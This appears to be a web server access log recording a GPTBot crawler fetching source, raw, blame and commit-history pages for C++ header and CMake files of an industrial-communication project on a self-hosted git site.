"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:48:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11314] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12361] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11430] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:15:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10434] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13640] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:48:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:48:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12705] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:48:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10525] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:15:48:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12897] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:48:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:48:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13028] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:48:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11821] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12510] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:48:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11897] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11432] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:48:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12015] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:49:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10563] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:49:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10246] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11522] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:49:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:15:49:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10244] [Gzip 